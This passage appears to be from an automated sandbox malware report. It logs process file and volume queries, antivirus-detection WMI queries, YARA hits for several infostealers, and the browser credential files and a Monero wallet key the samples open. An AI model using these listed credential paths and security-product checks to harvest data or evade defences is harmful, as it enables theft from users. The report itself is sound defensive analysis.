Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004026C4 GetSystemTime, 7_2_004026C4
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00405CF4 GetVersionExA, 7_2_00405CF4
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.1964191932.0000000000634000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000002.1990995859.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.1973708870.0000000001634000.00000004.00000020.00020000.00000000.sdmp, 1YtOZF0EeqgcR_ddwAXkTcuY.exe, 0000000F.00000002.1970588859.0000000000F45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.1964191932.0000000000634000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000002.1990995859.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000000.1922662863.0000000000032000.00000002.00000001.01000000.0000000D.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000000.1922876856.0000000000F22000.00000002.00000001.01000000.0000000F.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.1973708870.0000000001634000.00000004.00000020.00020000.00000000.sdmp, 1YtOZF0EeqgcR_ddwAXkTcuY.exe, 0000000F.00000002.1970588859.0000000000F45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2138074138.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2027068709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2589310760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2Umx78uafM0WA03fzJyYYhBa.exe PID: 8072, type: MEMORYSTR
Yara detected Socks5Systemz
Source: Yara match File source: 00000027.00000002.3002403298.0000000002C91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3002271535.0000000002BEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2308704967.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
